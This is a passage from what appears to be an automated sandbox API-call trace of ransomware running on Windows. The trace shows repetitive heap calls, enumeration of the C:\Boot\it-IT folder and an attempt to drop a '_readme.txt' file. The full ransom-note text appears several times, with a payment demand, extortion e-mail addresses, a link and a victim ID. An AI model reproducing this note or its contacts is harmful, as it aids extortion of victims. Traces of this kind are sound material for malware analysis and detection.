lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.649] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.649] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.649] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.649] PathFindFileNameW (pszPath="") returned="" [0165.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.649] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.650] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.650] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.650] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.650] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.650] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.650] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.650] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0165.650] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.650] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.650] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0165.651] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.651] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.651] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.651] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.651] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.651] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.651] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.652] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.652] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.652] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.652] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.652] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 